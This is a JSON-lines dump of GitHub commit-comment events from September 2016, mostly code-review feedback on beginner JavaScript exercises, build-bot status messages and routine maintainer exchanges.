{"id":"4620576775","type":"CommitCommentEvent","actor":{"login":"arnesongit"},"repo":{"name":"mones88/python-tidal"},"payload":{"comment":{"id":19180338,"position":null,"line":null,"path":null,"commit_id":"600577159d8f17ed480cad63769544d40768a48c","created_at":"2016-09-26T21:32:02Z","updated_at":"2016-09-26T21:32:02Z","body":"Hello mones88,\r\n\r\nyou use the new token with 'clientUniqueKey': '9116f4461454fa12' to get a login session.\r\nIs this unique key device independant or is it connected to your device or TIDAL account ?\r\n\r\nI would like to integrate this unique key into my Kodi TIDAL addon, because the \"old\"\r\nlogin method doesn't work anymore.\r\nBut I only can do this, if this key is the same for all Android devices.\r\n\r\nRegards\r\narneson"}},"created_at":"2016-09-26T21:32:02Z"}
{"id":"4620577445","type":"CommitCommentEvent","actor":{"login":"schell10"},"repo":{"name":"cop1000/cop1000"},"payload":{"comment":{"id":19180342,"position":null,"line":null,"path":null,"commit_id":"b60edfe86029d47be21a0985a900fc32c68339f7","created_at":"2016-09-26T21:32:11Z","updated_at":"2016-09-26T21:32:11Z","body":"https://www.freecodecamp.com/challenges/target-elements-by-id-using-jquery"}},"created_at":"2016-09-26T21:32:11Z"}
{"id":"4620578154","type":"CommitCommentEvent","actor":{"login":"pmoulon"},"repo":{"name":"sweeneychris/TheiaSfM"},"payload":{"comment":{"id":19180347,"position":26,"line":26,"path":"docs/source/cameras.rst","commit_id":"101a50683584d20d7b4c0f51aaba9043a180df7a","created_at":"2016-09-26T21:32:19Z","updated_at":"2016-09-26T21:32:19Z","body":"cenetered => centered"}},"created_at":"2016-09-26T21:32:19Z"}
{"id":"4620581670","type":"CommitCommentEvent","actor":{"login":"mulchy"},"repo":{"name":"laserlens/rho_code_challenge_1"},"payload":{"comment":{"id":19180364,"position":11,"line":8,"path":"1-variables/operators.js","commit_id":"0669a7e21d321c671d5117ac5131995d7df8858d","created_at":"2016-09-26T21:32:59Z","updated_at":"2016-09-26T21:32:59Z","body":"Nice work, these are all correct."}},"created_at":"2016-09-26T21:32:59Z"}
{"id":"4620581916","type":"CommitCommentEvent","actor":{"login":"mulchy"},"repo":{"name":"laserlens/rho_code_challenge_1"},"payload":{"comment":{"id":19180366,"position":14,"line":10,"path":"1-variables/strings.js","commit_id":"0669a7e21d321c671d5117ac5131995d7df8858d","created_at":"2016-09-26T21:33:02Z","updated_at":"2016-09-26T21:33:02Z","body":"Nice work, these are all correct."}},"created_at":"2016-09-26T21:33:02Z"}
{"id":"4620582078","type":"CommitCommentEvent","actor":{"login":"ChristophBerg"},"repo":{"name":"theory/pgtap"},"payload":{"comment":{"id":19180367,"position":null,"line":null,"path":null,"commit_id":"5ad76e25067463a863b12a13cfd3203f82595f9f","created_at":"2016-09-26T21:33:04Z","updated_at":"2016-09-26T21:33:04Z","body":"Hi,\r\n\r\nif you are already working on PG 10 support (cool :D), can we have a new release supporting 9.6 in the meantime? I just updated the Debian packages, and had to add some new files in test/expected to cater for extended diagnostics. A new tarball would be nice to base on.\r\n\r\nThanks!"}},"created_at":"2016-09-26T21:33:04Z"}
{"id":"4620582120","type":"CommitCommentEvent","actor":{"login":"mulchy"},"repo":{"name":"laserlens/rho_code_challenge_1"},"payload":{"comment":{"id":19180368,"position":12,"line":14,"path":"2-loops/all_your_loops.js","commit_id":"0669a7e21d321c671d5117ac5131995d7df8858d","created_at":"2016-09-26T21:33:05Z","updated_at":"2016-09-26T21:33:05Z","body":"Be sure to reset `i` to 0, or else this loop will never execute."}},"created_at":"2016-09-26T21:33:05Z"}
{"id":"4620582315","type":"CommitCommentEvent","actor":{"login":"mulchy"},"repo":{"name":"laserlens/rho_code_challenge_1"},"payload":{"comment":{"id":19180369,"position":13,"line":14,"path":"3-conditionals/if.js","commit_id":"0669a7e21d321c671d5117ac5131995d7df8858d","created_at":"2016-09-26T21:33:07Z","updated_at":"2016-09-26T21:33:07Z","body":"`>==` is a syntax error, this should be `>=`. Be sure to test your code by running it in a browser."}},"created_at":"2016-09-26T21:33:07Z"}
{"id":"4620582575","type":"CommitCommentEvent","actor":{"login":"mulchy"},"repo":{"name":"laserlens/rho_code_challenge_1"},"payload":{"comment":{"id":19180372,"position":11,"line":8,"path":"4-arrays/basics.js","commit_id":"0669a7e21d321c671d5117ac5131995d7df8858d","created_at":"2016-09-26T21:33:10Z","updated_at":"2016-09-26T21:33:10Z","body":"Nice work, these are all correct."}},"created_at":"2016-09-26T21:33:10Z"}
{"id":"4620582717","type":"CommitCommentEvent","actor":{"login":"ValeriyKnyazhev"},"repo":{"name":"ValeriyKnyazhev/ModuleHighlightingAndAutoCompleteon"},"payload":{"comment":{"id":19180373,"position":11,"line":6,"path":"ModuleHighlightingAndAutoCompleteon/ModuleHighlightingAndAutoCompleteon/main.cpp","commit_id":"489c65cc26f194b50cb1315e597452912d822c84","created_at":"2016-09-26T21:33:12Z","updated_at":"2016-09-26T21:33:12Z","body":"init просто вызывает метод, который извлекает из файла ключевые слова"}},"created_at":"2016-09-26T21:33:12Z"}
{"id":"4620582800","type":"CommitCommentEvent","actor":{"login":"mulchy"},"repo":{"name":"laserlens/rho_code_challenge_1"},"payload":{"comment":{"id":19180374,"position":16,"line":14,"path":"4-arrays/builtins.js","commit_id":"0669a7e21d321c671d5117ac5131995d7df8858d","created_at":"2016-09-26T21:33:13Z","updated_at":"2016-09-26T21:33:13Z","body":"`Math.sqrt1_2` is undefined. This is a tricky one, but a potential solution would look like this:\r\n\r\n```\r\nvar newArr = arr.map(function(element) {\r\n  return element / 2;\r\n});"}},"created_at":"2016-09-26T21:33:13Z"}
{"id":"4620583131","type":"CommitCommentEvent","actor":{"login":"mulchy"},"repo":{"name":"laserlens/rho_code_challenge_1"},"payload":{"comment":{"id":19180375,"position":3,"line":2,"path":"5-functions/func.js","commit_id":"0669a7e21d321c671d5117ac5131995d7df8858d","created_at":"2016-09-26T21:33:17Z","updated_at":"2016-09-26T21:33:17Z","body":"This could be written\r\n\r\n```\r\nfunction noArgs() {\r\n  return 4;\r\n}\r\n```"}},"created_at":"2016-09-26T21:33:17Z"}
{"id":"4620584273","type":"CommitCommentEvent","actor":{"login":"asmeurer"},"repo":{"name":"sympy/sympy-paper"},"payload":{"comment":{"id":19180378,"position":null,"line":null,"path":null,"commit_id":"9173c788871c1b9850f4d92f717d45ef21f60284","created_at":"2016-09-26T21:33:32Z","updated_at":"2016-09-26T21:33:32Z","body":"OK, that confused me actually. It was originally listed as \"Octave Symbolic\" but I changed it when I saw the repo. I'll change it as you suggest. "}},"created_at":"2016-09-26T21:33:32Z"}
{"id":"4620586881","type":"CommitCommentEvent","actor":{"login":"leirhyh"},"repo":{"name":"mgharvey/misc_python"},"payload":{"comment":{"id":19180382,"position":null,"line":null,"path":null,"commit_id":"1512dfe08273afbaf44a51aacf8de4b426bac438","created_at":"2016-09-26T21:34:03Z","updated_at":"2016-09-26T21:34:03Z","body":"Hi, there:\r\nAfter I downloaded the script and ran a set of standard phylip files in test folder as follows:\r\ngenetics@genetics2:~/Documents/phy_filter/indriidaegene$ python mean_distances_from_alignments.py -h\r\nusage: mean_distances_from_alignments.py [-h] in_dir format\r\n\r\nProgram description\r\n\r\npositional arguments:\r\n  in_dir      The input directory of alignments\r\n  format      Format of input files\r\n\r\noptional arguments:\r\n  -h, --help  show this help message and exit\r\ngenetics@genetics2:~/Documents/phy_filter/indriidaegene$ python mean_distances_from_alignments.py in_dir test format phylip\r\nusage: mean_distances_from_alignments.py [-h] in_dir format\r\nmean_distances_from_alignments.py: error: unrecognized arguments: format phylip\r\nI tried to changed the path but with more errors.  Is possible that there are some path issues?\r\n\r\nThanks,\r\n\r\nPeter"}},"created_at":"2016-09-26T21:34:03Z"}
{"id":"4620594978","type":"CommitCommentEvent","actor":{"login":"LucDemortier"},"repo":{"name":"JasperNLiberty/dsp"},"payload":{"comment":{"id":19180413,"position":null,"line":null,"path":null,"commit_id":"1249f6c8baee622c06d7ee1673f32225c07a6c05","created_at":"2016-09-26T21:35:44Z","updated_at":"2016-09-26T21:35:44Z","body":"RE: 05a-python.md\r\ncc: @lucdemortier @reshamametis @aramnath @gfsoileau @rsampath\r\n\r\nHello @JasperNLiberty \r\n\r\nGood work on the Python problems. Here are some comments:\r\n- Q3: Can you give an example of a lambda function used within `sorted`?\r\n- Q6, `front_back`: `if len(a) // 2 != len(a) / 2.:` seems like a complicated way of testing `if len(a)%2 != 0:`...\r\n- You might want to review some basic markdown syntax. For example, you can make small snippets of code more readable by inserting them between back ticks. If you have more than one line of code, insert the whole thing between two lines with three back ticks on each.\r\n\r\n👍 "}},"created_at":"2016-09-26T21:35:44Z"}
{"id":"4620595817","type":"CommitCommentEvent","actor":{"login":"antauth"},"repo":{"name":"PaulKatchmark/rho_code_challenge_1"},"payload":{"comment":{"id":19180419,"position":16,"line":18,"path":"2-loops/all_your_loops.js","commit_id":"a3cbb15d6243c44f6af7b18b726f284fa171ca30","created_at":"2016-09-26T21:35:55Z","updated_at":"2016-09-26T21:35:55Z","body":"The above totally works, but typically we don't want to rely on a variable created in another function/loop in this manner. In the future, it would be best practice to reset i to 0 before entering the while loop."}},"created_at":"2016-09-26T21:35:55Z"}
{"id":"4620600351","type":"CommitCommentEvent","actor":{"login":"reedloden"},"repo":{"name":"dropbox/zxcvbn"},"payload":{"comment":{"id":19180438,"position":null,"line":null,"path":null,"commit_id":"6350ec95736472dff538122f1e757618bb9c0e7f","created_at":"2016-09-26T21:36:48Z","updated_at":"2016-09-26T21:36:48Z","body":"@lowe, can you tag and release on GitHub as well? I see you released to npm already."}},"created_at":"2016-09-26T21:36:48Z"}
{"id":"4620602360","type":"CommitCommentEvent","actor":{"login":"kito2"},"repo":{"name":"malucooo/Otxserver-Global"},"payload":{"comment":{"id":19180441,"position":null,"line":null,"path":null,"commit_id":"584b46963da32276eee5ffbdeedd679488bc48ba","created_at":"2016-09-26T21:37:11Z","updated_at":"2016-09-26T21:37:11Z","body":"Why did you remove the line from those?\r\n"}},"created_at":"2016-09-26T21:37:11Z"}
{"id":"4620603795","type":"CommitCommentEvent","actor":{"login":"mulchy"},"repo":{"name":"laserlens/rho_code_challenge_1"},"payload":{"comment":{"id":19180444,"position":null,"line":null,"path":null,"commit_id":"0669a7e21d321c671d5117ac5131995d7df8858d","created_at":"2016-09-26T21:37:29Z","updated_at":"2016-09-26T21:37:29Z","body":"For sections 5 and 6, here are the solutions.\r\n\r\n```\r\n// 5-functions.js\r\n\r\n// 1 - Write a function declaration\r\n// that takes no arguments and\r\n// returns the value 4\r\nfunction takesNothing() {\r\n  return 4;\r\n}\r\n\r\n// 2 - Write a function declaration\r\n// that takes two arguments and\r\n// returns the value of the result\r\n// of the multiplication of both\r\n// arguments\r\nfunction multiplication(arg1, arg2) {\r\n  return arg1 * arg2;\r\n}\r\n\r\n// 3 - Write a function expression\r\n// that takes one argument and\r\n// console logs that value.\r\nvar myLogger = function(toLog) {\r\n  console.log(toLog);\r\n};\r\n\r\n// 4 - Write a function declaration\r\n// that takes a number and divides it\r\n// by two.\r\nfunction divideByTwo(aNumber) {\r\n  return aNumber / 2;\r\n}\r\n\r\n// 5 - Call the function from 4 and\r\n// pass it into the function from 2 called with\r\n// the arguments 10, 20. Console log the result.\r\nconsole.log(divideByTwo(multiplication(10, 20)));\r\n```\r\n\r\n```\r\n// 6-objects\r\n\r\n// 1 - Create an object literal\r\n// named prime with the properties:\r\n// - city\r\n// - state\r\n// - zip\r\n// Assign the values based on Prime's\r\n// address.\r\n\r\nvar prime = {\r\n  city: \"Bloomington\",\r\n  state: \"MN\",\r\n  zip: \"55431\"\r\n};\r\n\r\n// 2 - Using dot notation, create a\r\n// new property for prime. This property\r\n// will be called address and will\r\n// take the value of Prime's street\r\n// address.\r\nprime.address = \"9410 James Ave S\";\r\n\r\n\r\n// 3 - Using dot notation, create a\r\n// new method for prime. This method\r\n// will console log out the complete\r\n// address of prime. Call the new\r\n// property/method print.\r\n\r\nprime.logAddress = function() {\r\n  console.log(this.address);\r\n};\r\n\r\nconsole.log(prime);\r\nprime.logAddress();\r\n```"}},"created_at":"2016-09-26T21:37:29Z"}
{"id":"4620606893","type":"CommitCommentEvent","actor":{"login":"kito2"},"repo":{"name":"malucooo/Otxserver-Global"},"payload":{"comment":{"id":19180451,"position":null,"line":null,"path":null,"commit_id":"57aacb1b7d525965d5aa14bc0639b32c36aab8ed","created_at":"2016-09-26T21:38:07Z","updated_at":"2016-09-26T21:38:07Z","body":"10.98 when running the client crashes (using 10.98 at login)"}},"created_at":"2016-09-26T21:38:07Z"}
{"id":"4620608069","type":"CommitCommentEvent","actor":{"login":"cbm755"},"repo":{"name":"sympy/sympy-paper"},"payload":{"comment":{"id":19180456,"position":6,"line":21,"path":"projects_that_depend_on_sympy.tex","commit_id":"9173c788871c1b9850f4d92f717d45ef21f60284","created_at":"2016-09-26T21:38:20Z","updated_at":"2016-09-26T21:38:20Z","body":"Maybe these two lines as well:\r\n````\r\n\\href{https://github.com/cbm755/octsympy}{\\textbf{GNU Octave Symbolic Package}}:\r\nThe GNU Octave Symbolic package adds symbolic ...\r\n````"}},"created_at":"2016-09-26T21:38:20Z"}
{"id":"4620608173","type":"CommitCommentEvent","actor":{"login":"thopiekar"},"repo":{"name":"onitake/Uranium"},"payload":{"comment":{"id":19180457,"position":null,"line":null,"path":null,"commit_id":"d93728665b83766ea96a2ba89eec2dc3725705c9","created_at":"2016-09-26T21:38:21Z","updated_at":"2016-09-26T21:38:21Z","body":"No problem. You are right, but a simple symlink can also do the job.\nWell, I'm not caring much about the changelog, because I sure that nobody else cares about it, too.\nGetting debian into Ultimaker/Cura possibly won't ever happen. First there was never any interest/request to move my files to the main trees. And finally having the debian files in the main tree would also mean that Ultimaker supports this kind of installation and that isn't currently the case, as they are distributing software bundles.\nI got not problem that you are using parts of my work ( you are mentioning me in your commits and I get notifications about that, so it's cool to see where my work is going to ), but if it is your intention to reach more distributions, then you can invest your time much better 😉\nHowever, feel free to send me some improvements and patches if you like. Oh, a little hint: the dependencies on some QML modules have changed. You can research which ones are not needed anymore. Don't have time to make. Any investigations on that at the moment 😒"}},"created_at":"2016-09-26T21:38:21Z"}
{"id":"4620616777","type":"CommitCommentEvent","actor":{"login":"XenoDelMoto"},"repo":{"name":"XenoDelMoto/qqq"},"payload":{"comment":{"id":19180483,"position":null,"line":null,"path":null,"commit_id":"2b32588229259a5db3d3c1f5f839866752d4c192","created_at":"2016-09-26T21:40:01Z","updated_at":"2016-09-26T21:40:01Z","body":"Add commit for Git hub  editor"}},"created_at":"2016-09-26T21:40:01Z"}
{"id":"4620618424","type":"CommitCommentEvent","actor":{"login":"MilhouseVH"},"repo":{"name":"phil65/skin.estuary"},"payload":{"comment":{"id":19180491,"position":null,"line":null,"path":null,"commit_id":"db52ec89d7eef8847808366185891cffc645d34f","created_at":"2016-09-26T21:40:20Z","updated_at":"2016-09-26T21:40:20Z","body":"I think we need an `id=\"12\"` too."}},"created_at":"2016-09-26T21:40:20Z"}
{"id":"4620626721","type":"CommitCommentEvent","actor":{"login":"antauth"},"repo":{"name":"PaulKatchmark/rho_code_challenge_1"},"payload":{"comment":{"id":19180517,"position":28,"line":27,"path":"3-conditionals/if.js","commit_id":"a3cbb15d6243c44f6af7b18b726f284fa171ca30","created_at":"2016-09-26T21:41:55Z","updated_at":"2016-09-26T21:41:55Z","body":"Based on the instructions, this should be an `else if`:\r\n\r\nWe only want to handle two cases:\r\n\r\n1. if `first > second`\r\n2. if `second > first`\r\n\r\nThere is a third possible case that we do not want to handle: ` first == second`. However, the code above would handle this case because the `else` is not specific enough."}},"created_at":"2016-09-26T21:41:55Z"}
{"id":"4620634533","type":"CommitCommentEvent","actor":{"login":"mulchy"},"repo":{"name":"adwhitaker/rho_code_challenge_1"},"payload":{"comment":{"id":19180540,"position":15,"line":14,"path":"5-functions/func.js","commit_id":"4f0dc5a905a4fc8eb6c44877cd5d3c8958bbccc4","created_at":"2016-09-26T21:43:28Z","updated_at":"2016-09-26T21:43:28Z","body":"Nice function name :D"}},"created_at":"2016-09-26T21:43:28Z"}
{"id":"4620635736","type":"CommitCommentEvent","actor":{"login":"antauth"},"repo":{"name":"PaulKatchmark/rho_code_challenge_1"},"payload":{"comment":{"id":19180548,"position":17,"line":19,"path":"6-objects/literal.js","commit_id":"a3cbb15d6243c44f6af7b18b726f284fa171ca30","created_at":"2016-09-26T21:43:42Z","updated_at":"2016-09-26T21:43:42Z","body":"Here we were expecting something like `prime.address = \"9401 S James Ave\"`."}},"created_at":"2016-09-26T21:43:42Z"}
{"id":"4620636927","type":"CommitCommentEvent","actor":{"login":"maxeo"},"repo":{"name":"maxeo/FMwork"},"payload":{"comment":{"id":19180553,"position":null,"line":null,"path":null,"commit_id":"9617987df2224f698f8932f7ec5898c9c1ecd310","created_at":"2016-09-26T21:43:55Z","updated_at":"2016-09-26T21:43:55Z","body":"Per stile in questo caso si intenda codice più snello"}},"created_at":"2016-09-26T21:43:55Z"}
{"id":"4620637745","type":"CommitCommentEvent","actor":{"login":"gavinking"},"repo":{"name":"ceylon/ceylon-ide-common"},"payload":{"comment":{"id":19180555,"position":null,"line":null,"path":null,"commit_id":"e9917fecc9f6031c160506a047bc1629af8c748c","created_at":"2016-09-26T21:44:05Z","updated_at":"2016-09-26T21:44:05Z","body":"FTR it was related to ceylon/ceylon-ide-intellij#504."}},"created_at":"2016-09-26T21:44:05Z"}
{"id":"4620639723","type":"CommitCommentEvent","actor":{"login":"DmitryDorofeev"},"repo":{"name":"DmitryDorofeev/webserver"},"payload":{"comment":{"id":19180562,"position":67,"line":67,"path":"server.go","commit_id":"9176783b71fa60d199765c2b29f4dcf9c7e95118","created_at":"2016-09-26T21:44:28Z","updated_at":"2016-09-26T21:44:28Z","body":"pseep"}},"created_at":"2016-09-26T21:44:28Z"}
{"id":"4620645184","type":"CommitCommentEvent","actor":{"login":"binkybear"},"repo":{"name":"offensive-security/nethunter-app"},"payload":{"comment":{"id":19180586,"position":null,"line":null,"path":null,"commit_id":"5696afb39698a8c7f5996ae6c2a0d2c78697d707","created_at":"2016-09-26T21:45:31Z","updated_at":"2016-09-26T21:45:31Z","body":"I have pushed changes for the two fixes.  Will need to look at doing the busyboxsh later."}},"created_at":"2016-09-26T21:45:31Z"}
{"id":"4620647746","type":"CommitCommentEvent","actor":{"login":"phil65"},"repo":{"name":"phil65/skin.estuary"},"payload":{"comment":{"id":19180592,"position":null,"line":null,"path":null,"commit_id":"db52ec89d7eef8847808366185891cffc645d34f","created_at":"2016-09-26T21:45:59Z","updated_at":"2016-09-26T21:45:59Z","body":"ok. https://github.com/phil65/skin.estuary/commit/f91ea5eb81ddf45beef72ed0aac1d5d4480c1b67"}},"created_at":"2016-09-26T21:45:59Z"}
{"id":"4620654284","type":"CommitCommentEvent","actor":{"login":"mulchy"},"repo":{"name":"adwhitaker/rho_code_challenge_1"},"payload":{"comment":{"id":19180619,"position":7,"line":7,"path":"4-arrays/builtins.js","commit_id":"4f0dc5a905a4fc8eb6c44877cd5d3c8958bbccc4","created_at":"2016-09-26T21:47:14Z","updated_at":"2016-09-26T21:47:14Z","body":"[Slice](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Array/slice) will not modify the original array, [splice](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Array/splice) will."}},"created_at":"2016-09-26T21:47:14Z"}
{"id":"4620655043","type":"CommitCommentEvent","actor":{"login":"mcmonkey4eva"},"repo":{"name":"DenizenScript/Denizen2Sponge"},"payload":{"comment":{"id":19180620,"position":69,"line":69,"path":"src/main/java/com/denizenscript/denizen2sponge/commands/entity/SpawnCommand.java","commit_id":"4819aa78b40edc3dec1ef1f2c2f9f8acc6cc8f27","created_at":"2016-09-26T21:47:23Z","updated_at":"2016-09-26T21:47:23Z","body":"unneeded over specification - false is default"}},"created_at":"2016-09-26T21:47:23Z"}
{"id":"4620657717","type":"CommitCommentEvent","actor":{"login":"mcmonkey4eva"},"repo":{"name":"DenizenScript/Denizen2Sponge"},"payload":{"comment":{"id":19180625,"position":73,"line":73,"path":"src/main/java/com/denizenscript/denizen2sponge/commands/entity/SpawnCommand.java","commit_id":"4819aa78b40edc3dec1ef1f2c2f9f8acc6cc8f27","created_at":"2016-09-26T21:47:52Z","updated_at":"2016-09-26T21:47:52Z","body":"yes etypetag plis"}},"created_at":"2016-09-26T21:47:52Z"}
{"id":"4620660418","type":"CommitCommentEvent","actor":{"login":"radare"},"repo":{"name":"dequis/radare2"},"payload":{"comment":{"id":19180632,"position":4,"line":499,"path":"libr/anal/anal.c","commit_id":"9e1df760475cf5413a653440ae2953c30b6fb6f3","created_at":"2016-09-26T21:48:21Z","updated_at":"2016-09-26T21:48:21Z","body":"Missing space before ("}},"created_at":"2016-09-26T21:48:21Z"}
{"id":"4620660665","type":"CommitCommentEvent","actor":{"login":"mcmonkey4eva"},"repo":{"name":"DenizenScript/Denizen2Sponge"},"payload":{"comment":{"id":19180633,"position":100,"line":100,"path":"src/main/java/com/denizenscript/denizen2sponge/commands/entity/SpawnCommand.java","commit_id":"4819aa78b40edc3dec1ef1f2c2f9f8acc6cc8f27","created_at":"2016-09-26T21:48:23Z","updated_at":"2016-09-26T21:48:23Z","body":"error + continue = lolwut"}},"created_at":"2016-09-26T21:48:23Z"}
{"id":"4620660885","type":"CommitCommentEvent","actor":{"login":"radare"},"repo":{"name":"dequis/radare2"},"payload":{"comment":{"id":19180634,"position":7,"line":502,"path":"libr/anal/anal.c","commit_id":"9e1df760475cf5413a653440ae2953c30b6fb6f3","created_at":"2016-09-26T21:48:26Z","updated_at":"2016-09-26T21:48:26Z","body":"Same here"}},"created_at":"2016-09-26T21:48:26Z"}
{"id":"4620663878","type":"CommitCommentEvent","actor":{"login":"Jagged"},"repo":{"name":"Jagged/OneOf"},"payload":{"comment":{"id":19180640,"position":null,"line":null,"path":null,"commit_id":"1dc67297c2a8f233e9cc0de6bcc2cfc979ba0f11","created_at":"2016-09-26T21:49:03Z","updated_at":"2016-09-26T21:49:03Z","body":"Cheers for the feedback.  I've changed things to use \"is\" so values can be derived from T{n}.  Have fun with your branch!  With any luck the new \"match\" keyword and more powerful \"switch\" will be available soon in C# 7 which should ease some of the need for a chunk of this code, but sadly not all of it."}},"created_at":"2016-09-26T21:49:03Z"}
{"id":"4620667305","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19180646,"position":null,"line":null,"path":null,"commit_id":"ef34d3e80689fa2eb2e2d894dc1bd58f6e400df2","created_at":"2016-09-26T21:49:45Z","updated_at":"2016-09-26T21:49:45Z","body":"EMS (brianlball) - x86_64-Linux-Ubuntu-14.04-clang-3.5: OK (2287 of 2497 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-ef34d3e80689fa2eb2e2d894dc1bd58f6e400df2-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-ef34d3e80689fa2eb2e2d894dc1bd58f6e400df2-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-91.59%25-yellow.svg)</a> \n"}},"created_at":"2016-09-26T21:49:45Z"}
{"id":"4620667680","type":"CommitCommentEvent","actor":{"login":"mcmonkey4eva"},"repo":{"name":"DenizenScript/Denizen2Sponge"},"payload":{"comment":{"id":19180647,"position":96,"line":96,"path":"src/main/java/com/denizenscript/denizen2sponge/commands/entity/SpawnCommand.java","commit_id":"4819aa78b40edc3dec1ef1f2c2f9f8acc6cc8f27","created_at":"2016-09-26T21:49:49Z","updated_at":"2016-09-26T21:49:49Z","body":"should support full property key ids for future proofing"}},"created_at":"2016-09-26T21:49:49Z"}
{"id":"4620669031","type":"CommitCommentEvent","actor":{"login":"clarajohana"},"repo":{"name":"bayuelo/camaleon"},"payload":{"comment":{"id":19180652,"position":null,"line":null,"path":null,"commit_id":"176a6ef418d27f5724bc3697ee8130cf5ddd873a","created_at":"2016-09-26T21:50:05Z","updated_at":"2016-09-26T21:50:05Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Módulo Localización - Interfaz Grafica](https://trello.com/c/r19ayJZB/13-modulo-localizacion-interfaz-grafica)"}},"created_at":"2016-09-26T21:50:05Z"}
{"id":"4620669741","type":"CommitCommentEvent","actor":{"login":"mulchy"},"repo":{"name":"Lysautumn/rho_code_challenge_1"},"payload":{"comment":{"id":19180653,"position":20,"line":23,"path":"6-objects/literal.js","commit_id":"87ac99271e78abab0db8a12bda14f671a462b958","created_at":"2016-09-26T21:50:13Z","updated_at":"2016-09-26T21:50:13Z","body":"Close, this will assign the result of `console.log(...)` (which is `undefined`) to `prime.print`. What you want instead is:\r\n\r\n```\r\nprime.print = function() {\r\n  console.log(prime.address + '\\n' + prime.city + ', ' + prime.state + ' ' + prime.zip);\r\n}\r\n```"}},"created_at":"2016-09-26T21:50:13Z"}
{"id":"4620670152","type":"CommitCommentEvent","actor":{"login":"mdentremont"},"repo":{"name":"danielspaniel/ember-data-factory-guy"},"payload":{"comment":{"id":19180654,"position":null,"line":null,"path":null,"commit_id":"d5d0dca2d0d9075d963f7f30a1b4094a3558ed8d","created_at":"2016-09-26T21:50:17Z","updated_at":"2016-09-26T21:50:17Z","body":":+1:"}},"created_at":"2016-09-26T21:50:17Z"}
{"id":"4620671471","type":"CommitCommentEvent","actor":{"login":"a-viktorov"},"repo":{"name":"a-viktorov/a-viktorov.github.io"},"payload":{"comment":{"id":19180663,"position":null,"line":null,"path":null,"commit_id":"8d566245e357bbc2f8f0d7468b96c4f601f4a8d9","created_at":"2016-09-26T21:50:34Z","updated_at":"2016-09-26T21:50:34Z","body":"CSS"}},"created_at":"2016-09-26T21:50:34Z"}
{"id":"4620671772","type":"CommitCommentEvent","actor":{"login":"clarajohana"},"repo":{"name":"bayuelo/camaleon"},"payload":{"comment":{"id":19180664,"position":null,"line":null,"path":null,"commit_id":"845474b8b8f09d9b93f9704d4bc85e55a88e5289","created_at":"2016-09-26T21:50:38Z","updated_at":"2016-09-26T21:50:38Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Módulo Localización - Interfaz Grafica](https://trello.com/c/r19ayJZB/13-modulo-localizacion-interfaz-grafica)"}},"created_at":"2016-09-26T21:50:38Z"}
{"id":"4620675373","type":"CommitCommentEvent","actor":{"login":"clarajohana"},"repo":{"name":"bayuelo/camaleon"},"payload":{"comment":{"id":19180675,"position":null,"line":null,"path":null,"commit_id":"845474b8b8f09d9b93f9704d4bc85e55a88e5289","created_at":"2016-09-26T21:51:19Z","updated_at":"2016-09-26T21:51:19Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Módulo Materia Prima - Interfaz Gráfica](https://trello.com/c/uwuPCtVu/21-modulo-materia-prima-interfaz-grafica)"}},"created_at":"2016-09-26T21:51:19Z"}
{"id":"4620676342","type":"CommitCommentEvent","actor":{"login":"TommyStarK"},"repo":{"name":"ava-project/ava-core"},"payload":{"comment":{"id":19180678,"position":null,"line":null,"path":null,"commit_id":"9c68ac7eadd21a04e4f377c946b0fe2d133078fd","created_at":"2016-09-26T21:51:31Z","updated_at":"2016-09-26T21:51:31Z","body":"attention vous avez push des fichiers temporaires"}},"created_at":"2016-09-26T21:51:31Z"}
{"id":"4620676660","type":"CommitCommentEvent","actor":{"login":"c-holtermann"},"repo":{"name":"PF4Public/fetchmail"},"payload":{"comment":{"id":19180680,"position":null,"line":null,"path":null,"commit_id":"fd1bcc7e1df790185baae9c396e303c106463007","created_at":"2016-09-26T21:51:35Z","updated_at":"2016-09-26T21:51:35Z","body":"thanks, works for me !"}},"created_at":"2016-09-26T21:51:35Z"}
{"id":"4620680000","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimEssentials"},"payload":{"comment":{"id":19180688,"position":null,"line":null,"path":null,"commit_id":"9c3b623d526601a37ea33f16b520cd4eebf155d2","created_at":"2016-09-26T21:52:15Z","updated_at":"2016-09-26T21:52:15Z","body":"TeamCity Xbim :: Xbim Essentials :: XbimEssentials [Build 433](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1235&buildTypeId=XbimEssentials_XbimEssentials) is now running\n"}},"created_at":"2016-09-26T21:52:15Z"}
{"id":"4620685119","type":"CommitCommentEvent","actor":{"login":"Annpettway"},"repo":{"name":"Annpettway/Python-Video"},"payload":{"comment":{"id":19180708,"position":null,"line":null,"path":null,"commit_id":"301041677e832a7583e312e458f21bf940a0a19c","created_at":"2016-09-26T21:53:15Z","updated_at":"2016-09-26T21:53:15Z","body":"See Video:  \r\nhttps://youtu.be/sVWpHa_sdeA"}},"created_at":"2016-09-26T21:53:15Z"}
{"id":"4620689654","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimEssentials"},"payload":{"comment":{"id":19180721,"position":null,"line":null,"path":null,"commit_id":"9c3b623d526601a37ea33f16b520cd4eebf155d2","created_at":"2016-09-26T21:54:10Z","updated_at":"2016-09-26T21:54:10Z","body":"TeamCity Xbim :: Xbim Essentials :: XbimEssentials [Build 433](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1235&buildTypeId=XbimEssentials_XbimEssentials) outcome was **SUCCESS**\nSummary: Running Build time: 00:01:55"}},"created_at":"2016-09-26T21:54:10Z"}
